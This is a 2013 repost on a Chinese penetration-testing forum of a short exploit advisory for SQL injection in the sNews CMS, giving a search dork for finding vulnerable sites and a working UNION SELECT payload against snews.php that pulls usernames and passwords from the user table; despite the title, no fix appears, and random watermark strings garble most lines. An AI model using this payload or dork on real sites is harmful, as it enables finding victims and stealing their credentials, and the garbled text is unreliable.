中国网络渗透测试联盟

标题: CMS snews SQL注射及修复 [打印本页]
作者: admin    时间: 2013-1-23 08:55
标题: CMS snews SQL注射及修复
标题: CMS snews SQL Injection Vulnerability
; ~4 r0 h3 }" T7 b5 a+ V/ h作者: By onestree
2 r3 |6 e' l- P) h  e  y下载地址 : http://snewscms.com/6 \9 N% @. n+ X, c% P
测试平台 : ubuntu 12.10 / win 7+ C* p7 J  T* u9 G) T3 g% E& }
关键词: inurl:"tanyakan pada rumput yang bergoyang"
3 G3 `& r0 Z) e4 F, ?& C7 O, b
9 b* D& L( @8 G 1 w* Y5 a* D8 r: E/ o
*************************************************************' P% s$ i" W% {6 `

* _, _$ _7 O* VSQL poc:; ?' b4 u! T- T, r1 J+ W# Z" N

5 ^: s2 O5 L. q4 {$ ~http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]3 A2 ^; K/ P$ w
( Y9 G/ @2 I& e, X
示例; k) P% o8 R8 M  m6 Z/ N- l

0 h) j% `4 Z% u# xhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
  _8 }+ E& x3 B+ `! e3 M
* Y6 J) }0 Q1 O. x' t' o
! A& N% b& ?5 K& E# Q' ^致谢:
& n, G3 X1 ]$ G% K. C 4 U! U9 L* X& I7 y
  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell2 [5 |) [3 g% r# Y7 C
     ; b" c8 D1 R& G5 x# t3 ~* h2 Q
          indonesiancoder - moeslimh4x0r - go-coder# U- E4 Y8 W4 v1 V6 n
4 T  U) R# r& H
spesial my hunny :*7 ?1 b/ ~: e2 x6 F/ `




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2